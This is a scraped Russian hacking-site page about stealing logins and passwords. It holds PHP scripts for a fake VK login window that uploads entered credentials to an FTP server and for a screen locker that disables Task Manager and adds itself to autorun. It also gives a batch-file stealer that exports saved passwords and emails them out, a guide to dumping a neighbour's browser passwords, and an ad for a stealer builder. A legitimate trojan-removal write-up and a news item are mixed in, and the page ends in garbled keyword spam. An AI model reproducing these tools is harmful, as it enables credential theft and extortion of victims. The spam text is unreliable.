Софт

программа для кражи логинов и паролей

Рейтинг: 4.4/5.0 (783 проголосовавших)

Категория: Windows

Описание

Программа для кражи логинов и паролей

MessageBox("Неверно введён логин или пароль", "Ошибка");

Скрипт на кнопку "Разблокировать":
if(c("edit1")->text =="1337")< (ПАРОЛЬ ДЛЯ РАЗБЛОКИРОВКИ)
Run("explorer.exe", false); (ЗАПУСКАЕТ ПРОВОДНИК)
DisableTaskMng(false); (ВКЛЮЧАЕТ ДИСПЕДЧЕР ЗАДАЧ)
app::close(); (ЗАКРЫВАЕТ ПРОГРАММУ)
>
else<
c("edit1")->text = "Неверный код!" ;
c("label3")->text -= "1";
>

Скрипт для блокировки Windows:
DisableTaskMng(true); (ВЫРУБАЕТ ДИСПЕДЧЕР ЗАДАЧ)
shell_exec("TASKKILL /F /IM explorer.exe"); (УБИВАЕТ ПРОВОДНИК)
$w = $SCREEN->width;
$h = $SCREEN->height;
$project = 'InjectorBySolex.exe'; (НАЗВАНИЕ ПРОГРАММЫ)
$str = strtr($dir. '/', '\\');
writeRegKey(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\", "$str$project", STRING); (ЗАПИСЬ В РЕЕСТР - АВТОЗАГРУЗКА)

Скрипт на кнопку "Очистить":
c("edit1")->text = "" ;

Таймер обратного отсчета:
$q = c("label1")->caption;
c("label1")->caption = $q - 1;
$w = c("label1")->caption;
if($w == 0)<
$min = c("label2")->caption;
c("label2")->caption = $min - 1;
$mint = c("label2")->caption;
c("label1")->caption = 60;
>
if($mint == 0)<
if($w == 0)<
c("button1")->enabled = true;
c("timer1")->enable = false;
>
>
$minut = c("label2")->caption;
c("label3")->caption = $minut." Мин ". $w ." Сек";

Скрипт для акцивации:
if(c("edit1")->text =="код активации")<
HideForm(Form1, SW_SHOW);
LoadForm(ziabyka, SW_SHOW);
>
else<
MessageBox("Неверный код активации", "Error");
>


Скрипт для плеера:

Сайт иконок - http://www.iconsearch.ru
$result = c("openDlg1")->execute(); (ОТКРЫТЬ)
if ($result)
<
$arr = c("openDlg1")->files;
foreach ($arr as $i=>$file)
$arr[$i] = basename($file);
c("listBox1")->items->setArray($arr);
$music = c("listBox1")->items->selected; (ИГРАТЬ)
c("sqPlayer1")->fileName = $music;
c("sqPlayer1")->play();
WinShutdown();

Как записать текст в файл:
file_put_contents("<путь к файлу>", "<текст>");

Как получить содержимое файла:
$text = file_get_contents("<путь к файлу>");
Пример:
$text = file_get_contents("C:/FileName.txt"); print($text);

Скрипт отправки данных FTP:
PHP highlight
$ftp_server = (""); (СЕРВЕР FTP)
$ftp_login = (""); (ЛОГИН FTP)
$ftp_pass = (""); (ПАРОЛЬ FTP)
$file = ('logs.txt'); (ИМЯ ФАЙЛА С ЛОГАМИ)
$vk_login = c("edit1")->text; (ЛОГИН С ФЕЙКА)
$vk_pass = c("edit2")->text; (ПАРОЛЬ С ФЕЙКА)
$open = ftp_connect($ftp_server, 21, 30); (ПОДКЛЮЧЕНИЕ К FTP СЕРВЕРУ)
ftp_connect($ftp_server, 21, 30); (ПОДКЛЮЧАЕМСЯ)
ftp_login($open, $ftp_login, $ftp_pass); (АВТОРИЗУЕМСЯ)
ftp_get($open, $file, $file, FTP_BINARY); (СКАЧИВАЕМ ФАЙЛ С ЛОГАМИ)
$log = fopen($file,"a+"); (ОТКРЫВАЕМ СКАЧАНЫЙ ФАЙЛ)
fwrite($log,"$vk_login;$vk_pass \n"); (ЗАПИСЫВАЕМ ДАННЫЕ)
fclose($log); (ЗАКРЫВАЕМ ФАЙЛ)
ftp_pasv($open, true); (ПЕРЕКЛЮЧАЕМСЯ В ПАССИВНЫЙ РЕЖИМ)
!ftp_put($open, $file, $file, FTP_BINARY); (ОТПРАВЛЯЕМ ФАЙЛ НА FTP)
ftp_close($open); (ЗАКРЫВАЕМ СОЕДИНЕНИЕ)
file_delete("$file"); (УДАЛЯЕМ ФАЙЛ С ЛОГАМИ ИЗ КОМПЬЮТЕРА)
Создаем в корне FTP файл logs.txt с правами 777

Запретить закрытие программы:
$canclose=false

Прогресс бар двигается при нажатии на кнопку:
На кнопку:
ShowForm(progress1, SW_SHOW);
C("TIMER1")->ENABLE = TRUE;
C("TIMER1")->REPEAT = TRUE;
C("BUTTON1")->ENABLED = FALSE;
C("PROGRESS1")->POSITION=0;
на таймер:
c("progress1")->position +=1;
$time = c("progress1")->position;
if($time==3000)< c("timer1")->enable = false;
c("button1")->enabled = true;
>

программа для кражи логинов и паролей:

  • скачать
  • скачать
  • Другие статьи, обзоры программ, новости

    Как украсть пароль с компьютера?

    Как украсть пароль с компьютера?

    Как украсть пароль с компьютера Обзор моего эксперимента по взлому социальных сетей продолжается. При наличии фейка и правильного применения приёмов социальной инженерии жертва сама «отдаёт» пароль. А что же делать, если жертву не удалось раскрутить и вы не получили пароль от Одноклассников, ВКонтакте или другой социальной сети. Ведь взломать саму социальную сеть. найти в ней дыры и постараться украсть пароль будет очень сложно. У них трудится такой штат сотрудников, что они давно уже залатали найденные дыры.

    Но иногда пароли «висят» у нас под носом, остаётся лишь протянуть руку. Часто бывает так, что вы имеете доступ к компьютеру жертвы. Многие пользователи (раньше и я этим пренебрегал) часто сохраняют пароль при помощи так называемого жезла (волшебной палочки). К примеру, при вводе пароля браузер предлагает вам сохранить (запомнить) пароль, чтобы в дальнейшем не вводить его снова. Либо пользователи не разлогиниваются (не нажимают кнопку выхода) при «окончании использования» сайта.
    Благодаря лени человека, иначе это не назовёшь, можно украсть пароль с любого компьютера.

    Приведём пример. У вас есть доступ к компьютеру жертвы. Есть два способа получить пароли жертвы. Первый основан на расшифровке файла «жезла». второй — на кукисах. Если вы не понимаете, что это значит, лучше не вдавайтесь в подробности)).
    Благодаря программе WebBrowser PassView вы можете «расшифровать» пароли, сохранённые с помощью жезла. Программу можно запустить с флешки, что очень удобно. Пришли к соседке, вставили в комп флешку, отвлекли ее на пару минут, покликали пару клавиш и вуаля — все пароли вашей соседки на флешке в отдельном txt файле.
    Программа простая до ужаса, тем более и русифицированная. При запуске программа предложит вам все найденные ею пароли на данном компьютере.
    Скачать расшифровщик паролей браузеров WebBrowser PassView можно здесь. Программа весит 210 кб.

    Если программа не нашла пароли Оперы, то укажите ей путь до wand.dat (файл жезла Оперы).

    Программа ещё полезна тем, что может помочь вспомнить вам пароли на некоторых сайтах)).
    О краже паролей с компьютера с помощью кукисов и получение пароля от социалок без доступа к компьютеру читайте в следующих статьях.

    Рекомендуем к прочтению: 19 comments

    А что удобно на своем же компе проверил)))))))))

    Статья просто нужная, необходимая для начинающих Хакеров, очень понравилась… Благодарю за реальную информацию… Не то что всякий муссор, как обычно бывает. «программа чудо, взломает любой пороль»

    у меня почему-то программа не нашла ни одного ключа на моем же компьютере, хотя почта была открыта… подскажите, в чем проблема?

    Программа находит ключи, которые записаны в браузерах.

    Проверила на работе, все получилось) спасибо)

    Халявы увы пока нет))

    Вот такую бы программу чтобы её можно было скинуть в скайпе жертва её запускает а пароли все приходят ко мне на компьютер. Было бы круто.

    Научите меня исскуству взлома) Плиз) Мой скайп valentin_css о цене договоримся)

    Здравствуйте. Программа хорошая. Работает. Только вот Яндекс браузер не видит. Тут прописаны только Опера, Гугл Хром. Мозила, и интернет експлорер. Скажите пожалуйста можно как то в программу еще и Яндекс добавить?

    caption=Дополнительные параметры
    1=OK
    2=Отмена
    1005=Загружать пароли из…
    1006=Internet Explorer
    1007=Mozilla Firefox
    1008=Google Chrome
    1009=Opera
    1010=Параметры Firefox
    1012=Главный пароль:
    1013=Профиль Firefox:
    1015=…
    1016=Установка Firefox:
    1018=…
    1019=Параметры Chrome
    1020=Профиль Chrome:
    1022=…
    1023=Параметры Opera
    1024=Файл wand.dat:
    1026=…
    1027=Safari
    Вот тут помоему что то дописать нужно. Только как правильнее, я не знаю. Свои выводы делаю на интуитивном уровне, и опираясь на скудные знания школьной программы информатики за 1999 год. Подскажите пожалуйста, как правильно сделать. Спасибо.

    Увы, я не разработчик программы и насчет ее доработок ничего не могу подсказать.

    Много лет занимался, компьютерами но потом бросил служил много служил, теперь вот хочу вернутся в строй… можете подсказать с чего начать решил разобраться в шпионском оборудовании, как работать с телефонами, как повысить свою квалификацию нужно для работы, какую литературу, посоветуете и как пройти практику относительно быстро?

    Мне нужна программа для кражи паролей для lineage 2!

    Мне нужна программа для кражи паролей для lineage 2.

    Артём Ученик (195), закрыт 3 года назад

    Мне нужна программа для кражи паролей для lineage 2. Короче программа должна выглядеть как бор на рыбалку/фарм мобов в афк и т. п. Вэтой программе должны быть поля для ввода логина и пароля, выбор сервера, и ник персонажа. И чтобы все введенные данные высылались мне на E-mail, помогите плиз.

    Евгений Ломега Оракул (66593) 3 года назад

    А ключ от квартиры где деньги лежат тебе не нужен?

    Artur Kornilov Мастер (1547) 3 года назад

    1) это не законно
    2) это не бесплатно
    3) она точно нужна?

    Бешеный Кош@k Мудрец (15909) 3 года назад

    нашел где спросить сюда иди! http://forum.xakep.ru/ -да и если тут ответят ты ничего не поймешь даже на русском))

    Владимир Перовский Ученик (140) 3 года назад

    Ты подумай, стоит ли тебе терять игру навсегда?

    LED Мудрец (18766) 3 года назад

    ктож против, пиши

    Моя компания - Кража паролей

    Как создать троян (вирус) для кражи паролей

    Привет,сегодня мы из Multi Password Recovery сделаем программу(стиллер) для кражи всех паролей с компа.
    Первое что нам нужно это сам MPR. качаем по ссылке http://www.passrecovery.com/
    установим MPR в отдельную папку. установили? Удаляем установку- должно остаться 6 файлов, качаем blat ---------------------http://sourceforge.net/projects/blat/files/Blat%20Full%20Version/Blat%20v2.6.2/blat262.full.zip/download
    архив распаковываем в ту же папку с MPR.
    Создаем файл 1.bat открываем с помощью Блокнота и вводим содержимое:

    @echo off :start ping ya.ru -n 5 >nul if %errorlevel%==0 (goto send) else (goto end) :end goto :start :send blat.exe -install -server smtp.yandex.ru -port 587 -f твой логин@yandex.ru -u логин -pw пароль mpr.exe /export ren *.mpf pass.mpf blat.exe -bоdу PassReg -to кому отправлять@yandex.ru -attach pass.mpf del %Temp%\*.* /Q /S /F

    изменяем данные на свои.
    Сохраняем
    качаем программу http://download.cnet.com/Bat-To-Exe-Converter/3000-2069_4-10555897.HТМL
    открываем её. в batch file вводим файл 1.bat. В дереве visibility Ставим галку на второй чексбокс.
    заходим на вкладку include нажимаем на кнопку add и выбераем файлы

    HookLib.dll blat.lib blat.exe blat.dll MPR.exe


    И нажимаем Compile. Открываем файл и смотрим почту
    Вот и пароли. строго не судить мое первое видео.

    Троян ворующий пароли В Контакте и Одноклассники (

    Пару дней назад мне на стенке в контакте один из друзей оставил граффити с сообщением, что он взломал мой аккаунт, т.ж. там была ссылка на сайта vk-****.msk.ru. Ну да. Еще бы. ) Ему я сразу отписал, чтобы полечил себя да пароль сменил. Но вот ссылка меня все же заинтересовала, хотя я точно знал, что это троян (именно он меня и заинтересовал). Решил сходить по этой ссылке. В результате мне предложили скачать программу, которая якобы юзает недавно найденную уязвимость контакта и позволяет взломать любую учетку. В общем поржал немного и скачал эту дрянь :) Уж очень захотелось вспомнить студенческие года, когда изучал вирусы. Да и почитывая блог другана порой накаляет меня - это же как охота на дичь :)
    В этом посте опишу этого троя, че делает, как работает, какую деструктивную активность проявляет, как лечить, а так же дам самописную программку для вычистки этой гадости с потрохами. А в конце приведу техническую информацию для IT'шников и исходники вышеупомянутой программки.


    Краткое описание
    Троянская программа mvk.exe не попадает на компьютер без ведома пользователя, как это бывает с другими. Пользователь сам скачивает и запускает его т.к. думает, что это другая программа (для взлома контакта). Простенькая социальная инженерия :)

    Что творит в системе или деструктивная активность
    После запуска файла mvk.exe он удаляется, после чего появляется окно, в котором предложено ввести ID юзера "В Контакте". Если ввести любой ID и нажать кнопку, то появляется сообщение, что не возможно получить данные, т.к. уязвимость контакта уже закрыли.
    Т.ж. троян создает 3 файла во временной папке пользователя (%TMP%), один ярлык в папке автозагрузки, который запускает файл из %WinDir% (этот файл тоже трой делает) и 1 файл в %System%. Т.е. получается 6 файлов.
    В добавок трой изменяет ключ запуска проводника в реестре. И файл hosts.

    А теперь конкретнее. Файлы:
    %WinDir%\activate.exe
    %System%\loio.jho
    %TMP%\2.tmp
    %TMP%\3.tmp
    %TMP%\4.tmp
    %StartDir%\Quick Office.lnk

    И реестр:
    Ветка - HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\, параметр - Shell, его значение - Explorer.exe rundll32.exe loio.jho soalsv. А должно быть просто - Explorer.exe.

    Как лечить
    Загрузиться в безопасном режиме (жать F8 после включения компа). Открыть диспетчер задач (Ctrl+Alt+Del или Ctrl+Shift+Esc) и "убить" процесс "activate.exe", если таковой имеется. Потом удалить файлы C:\Windows\activate.exe и C:\Windows\System32\loio.jho, удалить ярлык из папки Автозагрузка (Пуск -> Программы -> Автозагрузка) и удалить все файлы из временной папки пользователя (обычно C:\Documents and Settings\ИМЯ_ПОЛЬЗОВАТЕЛЯ\Local Settings\Temp). Открыть редактор реестра (Пуск -> Выполнить. ввести regedit и нажать ОК), перейти в ветку HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\, найти параметр Shell, дважды щелкнуть по нему мышкой и заменить его значение на "Explorer.exe" (без кавычек). Т.ж. нужно перейти в папку C:\Windows\System32\Drivers\etc\, открыть файл hosts в блокноте и удалить из него все строки за исключением "127.0.0.1 localhost".

    Вы так же можете скачать мою программку для удаления этого вируса - anti_mvk.exe. После запуска anti_mvk.exe и нажатия кнопку "Лечить" исчезнет рабочий стол, а потом компьютер будет перезагружен, поэтому предварительно лучше закрыть все открытые программы для предотвращения утери не сохраненной информации.
    ВАЖНО. Утила не сообщает есть ли троян или нет, а тупо пытается вычистить все, что может указывать на наличие трояна в системе, поэтому перезагрузка произдойдет не зависимо от того, есть ли троян или нет.

    Краткая техническая информация для IT'шников
    В этом разделе кратко опишу как я его анализировал. Может кому будет интересно. Размер файла 19456 байт. MD5-хэш - d5dbd34b12eb653d07ec17287fd3f26c. Судя по всему, написан на Delphi и упакован UPX'ом.
    Как уже говорил, спам был в виде граффити на моей стенке в контакте, там была нарисована "ссылка" на vk-****.msk.ru. Если зайти на этот адрес, то происходил редирект на http://vk****-****.blogspot.com/ и уже в этом блоге предлагают скачать этот самый троян, под видом программы для взлома аккаунтов контакта и "включить защиту от взлома своей анкеты" (от последнего чуть под стол не свалился).
    В анализе участвовали след. утилиты:
    Autoruns - Позволяет определить, какие приложения запускаются автоматически при загрузке системы и выполнении входа в систему. Также показывает полный перечень путей в реестре и на диске, где может быть настроен автоматический запуск приложений.
    Process Explorer - Отображает файлы, разделы реестра, библиотеки DLL и прочие объекты, открытые или загруженные различными процессами, а также другую информацию, включая владельца процесса.
    AVZ4 - Очень хорошая утилита, помогающая исследовать систему (ВАЖНО. В кривых руках может загубить систему. ).
    VirtualBox - виртуальная машина, на ней я исследовал (запускал) вирус.

    Для начала запустил Autoruns, подождал пока он отработает и сохранил список. Потом перешел к AVZ4. В нем задействовал функции "Исследование системы", "Резервное копирование" и "Ревизор". После чего запустил Process Explorer, чтобы можно было видеть какие дополнительные (под)процессы запускает троян. Положил на рабочий стол и запустил файл трояна, Process Explorer тут же был закрыт, поэтому я не смог увидеть то, что хотел. Файл трояна с рабочего стола исчез (удалился). Через пару секунд появилось окно трояна, о котором говорилось во втором разделе поста. Снова запустил Process Explorer и увидел от моего имени запущенные процессы svchost.exe и 4.tmp. Первый - родной процесс (файл) винды и запущен был из %System%. Зачем его запустил троян, не знаю, не разбирался. Второй это компонент трояна. Закрыл окно трояна.
    Снова запустил Autoruns и AVZ4 и повторил те действия, которые делал до запуска трояна. После чего перезагрузился в безопасный режим и снова повторил эти действия. Далее скинул полученные файлы-отчеты себе на хоста машину (Linux Ubuntu 9.10 Desktop) и уже на ней произвел анализ этих логов (отчетов).
    На основе анализа логов, т.е. их сравнении, выяснилось то, что было описано во втором разделе данного поста. Компоненты трояна анализировать не стал. Вот скрины с сайта VirusTotal, на которых видно, как и какие антивири идентифицируют троян и его компоненты (NOD32 меня просто убил своей реакцией на ярлык о_О ) на данный момент, если кому интересно:


    Далее была написана не большая "антивирусная" утилита anti_mvk.exe. на AutoIT. Забрать можно тут - бинарники и исходники .

    Информация с сайта http://angel2s2.blogspot.com/. Если Вы читаете информацию на другом сайте, пожалуйста свяжитесь с автором сайта http://angel2s2.blogspot.com/ .

    Похожие статьи

    молодец!) укатал NOD в бетон))

    Честно сказать, даже не пытался; но, как известно, горькая правда лучше, чем сладкая ложь. Его я всегда уважал, даже советовал раньше коллегам и друзьям. Но этот случай меня просто убил. А в добавок подтвердил то, что в инете в последнее время говорят, что он значительно хуже стал. Больше никогда его ни где не поставлю! Тот же Avast! Home Edition щас на много лучше нода.

    Нормальная статья,думаю многим поможет.

    Хотел удалить в безопасном режиме loio.jho не нашёл, shell со значением explorer.exe в общем вроде бы всё в порядке, но с рабочего стола mvk.exe удалить не могу.

    А как mvk.exe попал на рабочий стол? Видать из под другой учетной записи (скорее всего с правами администратора), а т.к. у вашей учетки нет прав админа, то вы его и не можете удалить. Либо нарушились права доступа к файлу, т.е. выставлен запрет на запись/удаление этого файла. Попробуйте загрузиться в безопасном режиме и войти под учеткой "Администратор", после чего удалить файл. Если не поможет, тогда в свойствах файла на закладке безопасность надо дать права на запись для этой учетки либо группы администраторы.

    Параметр реестра shell имеет нормальное значение (explorer.exe) вероятнее всего из-за того, что вирус был запущен без прав администратора (обычный пользователь не имеет доступа на запись к этой ветке реестра, как правило).

    Хехе,мне в Контакте на тоже это написали.Естественно сразу понял,что тупой развод,но по ссылке ради интереса прошел.Скачал эту дрянь,предварителньо запустив каспер,каспер сразу завопил про троян в архиве,а я лишний раз убедился)))

    Рад за вас, что все хорошо прошло.
    Но на рабочей системе лучше так не делать, т.к. троян может быть и свежим, а антивирь его может и не знать. О последствиях, думаю, и так понятно ;)
    Да, и еще, советую по левым ссылкам без дополнения для FireFox'а NoScript не ходить, т.к. сайт может использовать вредоносные яваскрипты. Я лично уже давно никуда не хожу без этого дополнения и юзаю только FF.

    Спасибо большое. Люблю вас.

    Можете так же, если хотите, почитать блог моего друга - http://antivirusfagot.blogspot.com/ - он как раз антивирусной безопасностью занимается.

    ЗЫЖ не рЫкламКО

    "Хотел удалить в безопасном режиме loio.jho не нашёл, shell со значением explorer.exe в общем вроде бы всё в порядке, но с рабочего стола mvk.exe удалить не могу." это моё было.
    похоже меня спасло, что у меня учётная запись на русском языке, mkv команда написанна странными символами -рЄър\¦рсюўшщ ёЄюы\mvk.exe
    а должно быть Хатка\Рабочий стол\mvk.exe
    попал он ко мне, так как сам его скачал, антивирусом проверил(каспер KIS 2009) ничего, и сейчас проверяю, тоже всё нормально. вот не могу понять что к чему. Попробую удалить.

    Хм. Странно. У меня папка "Рабочий стол" тоже на русском была, когда исследовал эту заразу, и запускал с рабочего стола. Видать это из-за того, что кодовая страница кривоватая. У вас во всех программах нормально отображаются русские буквы? Если нет, тогда понятно становится.

    Странно, что у вас каспер ничего не находим в этом файле. Может вы просто базы не обновили?
    Может быть и так, что уже какой-то руткит сидит в системе и "парит мозг" касперу. Поэтому лучше попробуйте загрузить комп с какого-нибудь LiveCD и с него проверить систему. Можете взять каспера (http://devbuilds.kaspersky-labs.com/devbuilds/RescueDisk/) или доктора (http://www.freedrweb.com/livecd/).

    СПАСИБО. но маil.ru почта не открываеться. зато вконтакт входит. я вручную не нашел activate.exe и loio.jho я через программу вашу зделал подскожите че с мейлом делать.

    Эти 2 файла вы не нашли скорее всего потому, что работаете под ограниченной учетной записью, т.е. без прав администратора (у обычного пользователя нет прав на запись в системный каталог).

    С почтой. Попробуйте воспользоваться системой восстановления пароля. Или вы имеете ввиду, что сайт вообщем не открывается? Тогда попробуйте проверить файл C:\Windows\System32\Drivers\etc\hosts, откройте его в блокноте и удалите из него все строки за исключением "127.0.0.1 localhost". Еще проверьте систему с помощью антивирусных утилит AVPTool и/или Dr.Web CureIT (они бесплатные).

    Привет. Я тож скачал ради интереса прогу, после установки сразу удалилось.

    Через некоторое время Авира выписала что нашла какой то троян loio.
    Я сразу пошел по адресу
    Мой комп/диск С/Windows/loio (или как то так:), нашел эту прогу, почухал затылок, думаю, удалять или не удалять, махнул рукой и удалил.
    Что делать теперь. Пишет при запуске компа что файл loio не найден. И еще одно. После того как я удалил этого трояна звук стал плохо работать(не знаю, может дело не в этом).

    Цитата из этого поста:
    Ветка - HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\, параметр - Shell, его значение - Explorer.exe rundll32.exe loio.jho soalsv. А должно быть просто - Explorer.exe.

    Т.е. попробуйте в этой ветке проверить.


    А на счет звука сказать не могу ничего. Хотя. Попробуйте переустановить драйвера.

    Да, и еще. Запустите мою утилитку, возможно у вас следы остались от этого троя, эта утилитка их подчистит.

    Спасибо за совет.

    Цитата:
    Как лечить
    Загрузиться в безопасном режиме (жать F8 после включения компа). Удалить файлы C:\Windows\activate.exe и C:\Windows\System32\loio.jho, удалить ярлык из папки Автозагрузка (Пуск -> Программы -> Автозагрузка) и удалить все файлы из временной папки пользователя (обычно C:\Documents and Settings\ИМЯ_ПОЛЬЗОВАТЕЛЯ\Local Settings\Temp). Открыть редактор реестра (Пуск -> Выполнить. ввести regedit и нажать ОК), перейти в ветку HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\, найти параметр Shell, дважды щелкнуть по нему мышкой и заменить его значение на "Explorer.exe" (без кавычек). Т.ж. нужно перейти в папку C:\Windows\System32\Drivers\etc\, открыть файл hosts в блокноте и удалить из него все строки за исключением "127.0.0.1 localhost".


    Все это делать обязательно по порядку. )

    Я вот только забыл упомянуть, что надо проверить не запущен ли процесс activate.exe, и если запущен убить его. Пофиксил.
    Да, лучше делать именно в этом порядке, т.к. если вирус будет запущен, а ты вначале реестр почистишь, то вирус может успеть (и скорее всего успеет) создать снова нужную ему запись, а потом при загрузке могут сыпаться ошибки, что не удается найти тот или иной файл.

    А лучше воспользуйся утилитой, которая в этом посте выложена, она сама все сделает. А во временной папке ты сможешь найти отчет о ее работе после ребута компа.

    Огромное спасибо,очень благодарен тебе!
    P.S Ты на кого и где учился?

    ) Не за что, рад что помогло.

    По большей мере я самоучка. Хотя закончил Калининградский Технический Колледж по специальности 2204: "Техническое обслуживание средств вычислительной техники и компьютерных сетей". Особенно понравилось то, что очень детально изучали сети, вплоть до бита в сетевых пакетах.
    На вышку пока не ходил, время жалко на нее, да и не даст она мне знаний. Хотя ради корочки надо бы :)

    Angel 2S2 если не сложно,можешь посоветовать какие нибудь сайты где ты например само обучался.
    А то у меня также специальность,а нового я толом не узнал из колледжа.

    P.S Пока не закончил колледж хоть с чем-то уйти могу,а то не посебе как-то)

    Где учишься? Где живешь (город)?

    Можешь попробовать для начала - Интернет-Университет Информационных Технологий!. там много полезного. Выбираешь курс и читаешь лекции. Есть как платные так и бесплатные. А потом уже и к блогам не заметно для себя перейдешь. Лично я как раз многому по ним учился. То что я читаю можешь посмотреть у меня в колонке справа - "Я читаю. ", там только по ИТ.

    Учусь на 3 курсе в колледже МКУ и НТ, пока что нечего полезного(в плане Системного администратора и т.д) не узнал.
    Вот боюсь уйти так нечего нового не узнав,вот хочу взяться за ум пока не поздно (.
    Ты можешь объяснить что из себя представляет "Интернет-Университет Информационных Технологий!",я там запишусь и мне скажут дату когда придти,или что?

    P.S Сказать честно до этого кроме обучение в колледже мало что смотрел в интернете в плане специальности,вот думаю лучше буду пытаться само обучится чем работать в к каком-то ашане.

    Нам тоже до 3 курса ничего по специальности не рассказывали. Только на третьем курсе стали сети изучать, а на 4-м появилась специализация, при том был выбор на техника или админа. Я выбрал второе. Изучали линукс и дополнительные подробности по сетям.
    Самообразование оно должно быть в обязательном порядке. В ИТ сфере все очень быстро развивается, поэтому надо много читать и постоянно следить за новостями.

    На счет того инет-универа. Ты зайди, зарегайся там. А дальше сам поймешь. Не надо там никуда записываться. Там есть хорошее "описание" (или как это назвать), прочитав его, ты все поймешь :)

    Спасибо за консультацию xD.Мне есть над чем подумать)

    неплохо так выгоды срубили создатели трояна.

    Админ, большое спасибо за прогу anti_mvk.exe она реал работает)) Я все виды фнтивирусов перепробывал, не один не находит. так что это прога совершенство))) Спасибо большое. Советую всем)))

    Не за что :)) Рад, что помогло :)

    Спасибо за программу. у меня тоже был этот вирус и эффект от него был такой что при попытки запуска любого поисковика автоматом перекидывало на страницу в контакте

    Хм. У меня такого при тесте (изучении) не было. Может у вас еще какой-то был? У моей сестры был вирь, который тоже самое делал, но там обошлось банальной чисткой C:\Windows\System32\Drivers\etc\hosts, т.е. вирь в системе не сидел, а только правил этот файл и удалялся.

    а как написать прогу эту?

    anti_mvk? Берете доки по AutoIT и читаете и изучаете (чтобы понять синтаксис языка). Потом можете взять исходники anti_mvk и изучить их. Если же в программировании не разбираетесь, то вначале надо научиться вообщем понимать кодинг и основные принципы и правила.

    Или вы имели ввиду троян? Тогда вы ошиблись адресом.

    Чот искала вир какой-то и наткнулась на статейку. Молодца. Я с этой бякой столкнулась на работе, когда девушки активно клацали все подряд вконтакте и по сетке всякое гэ расползалось очень быстро. Ну, я тогда решила выпендриться своими неглубокими познаниями в защите инфы и как раз на мвк наткнулась на рабочем столе )) А компов. гыгы. штук 10 было. И подруга всем разослала это файло. Оно с рабочего не удалялось. Короче убила времени на чистку машин и сервака немеряно. Кто ж тогда знал, что есть умные люди, уже написавшие чистилку )))

    Спасибо, очень приятно :)

    Я ХОЧУ ЭТУ ПРОГРАММУ.

    Подарите мне ее плиз.

    Мой майл _ neizvestnaya.victoria@yandex.ru

    Доброго Вам времени Суток!

    Я Благодарен(a) иногда очень Bам, за благое-благие ваши дела.

    Пожалуйста подарите мне несколько программ для взлома банковских лицевых счетов, паролей и т.д.

    Заранее Вас БЛАГОДАРЮ.

    P.S Мой E-Mail _ neizvestnaya.victoria@yandex.ru

    Пришло тут школоло, блеать.
    Для начала предлагаю почитать ст. 273 УК РФ "Создание, использование и распространение вредоносных программ для ЭВМ ".

    а как вам suoerantispawer?

    Кража паролей

    Кража паролей с любого компьютера

    Всем привет! Давно искал рабочий софт для кражи паролей с компьютера у жертвы. Так вот с помощью данной программы можно создать стиллел и своровать все пароли с компьютера, например, девушки, или же друга, ну короче у кого захотите, это уже от Вас зависит. После того как создали стиллер с помощью данного софта, нужно отправить жертве и сказать, чтобы он запустил этот стиллер, после все пароли будут сворованы и будут отправлены на Вашу почту, которую указали при создании этого стиллера. Так же в программе есть джойнер-это склейщик нескольких файлов, к примеру, картинка в формате JPG и трояна в виде исполняемого файла EXE в один файл. Можно добавлять иконку и инфу о файле.

    Автор публикации

    не в сети 2 часа

    Добро пожаловать на мой сайт!

    Комментарии: 287 Публикации: 2664 Регистрация: 16-09-2012

    Нет комментариев Добавить комментарий Отменить ответ

    Для отправки комментария вам необходимо авторизоваться .

    Поиск по сайту Главное меню категорий Новые пользователи Поиск по сайту Счетчик посещения Анализ PR-CY

    тИЦ и PR сайта

    Best-Hacker.RU © 2012 - 2016. При использовании материалов сайта, обратная ссылка обязательна. Все материалы, представленные на сайте, были взяты из открытого доступа, или опубликованы посетителями и представлены исключительно для ознакомления. Ни создатели сайта, ни хостинг-провайдер, ни кто-либо еще не несут никакой ответственности за собранные здесь материалы.

    Вирус для WhatsApp: кража логинов и паролей

    Вирус атакует пользователей WhatsApp. Вирус для WhatsApp - вредоносная программа для кражи данных.

    Злоумышленники не сидят без дела и постоянно разрабатывают новые способы кражи логинов и паролей пользователей к интернет-банкам. В этот раз они приступили к обману тех, кто пользуется приложением WhatsApp. По мнению хакеров, жертвы мало, что знают о новинках, поэтому предлагают им загрузить новую версию приложения, предназначенного для компьютера. Вирус для WhatsApp попадает в телефоны пользователей.

    По словам представителей компании Eset, письма от злоумышленников содержат ссылку, будто бы ведущую на официальный сайт WhatsApp, но на деле пользователи попадают на другую площадку, где скачивают файл WhatsAppInstall.exe. Так скрывается троян-загрузчик Win32/TrojanDownloader.VB.QRM.

    После того, как вирус попадает в Windows, он начинает скрытно загружать другую вредоносную программу, которая предназначена для кражи аутентификационных данных для входа в интернет-банки. Специалистам Eset удалось установить, что вредоносную программу создали в Бразилии. Атаки злоумышленников, скорее всего, могут быть направлены и на пользователей из других стран, в том числе – из России.

    В январе текущего года WhatsApp, на самом деле, запустил веб-версию мессенджера, но пользователям для его использования не нужно скачивать дополнительное приложение. Он открывается непосредственно в браузере, как другие страницы. И, надо сказать, версия не понравилась пользователям по ряду причин. И одной из них называют тот факт, что сначала нужно связать смартфон с браузером. Да и работать мессенджер на компьютере будет только в том случае, если смартфон подключен к интернету.

    Мар 11, 2015 Екатерина Пастухова

    Скачать программу для кражей логинов и паролей решено

    Программу для кражей логинов и паролей

    Game Studio. Эта программа сделает качественный подбор логина и пароля любого. fttx. Вы сможете получить. и приказ генерального прокурора рк от 16 ноября 2011 года 109. Duration: 11:03. Первые вредоносные программы для Android появились в 2010 году.

    Спокойно и без лишних проблем осуществлять кражу паролей. OdnoMaster, С помощью лучшей программы для взлома паролей Eisa Recovery, 17 фев 2013. Программа для взлома webmoney, Acejas;3 11,500 views. На данном сайте Вы найдёте все программы которые связаны с кражей данных, трафареты цветов для декора стен своими руками .

    Как скачать программу. Перехватывание пароля и логина пользователя любого сайта во время его авторизации. 18 дек 2014. Как создать свою программу для кражи логинов и паролей 2015 Часть 2. Антенны cdma. Подключаем 3g инернет интертелеком, Материалы с нашим участием регулярно появляются в прессе и на интернет-ресурсах. Скачать Dr.Web для Android.

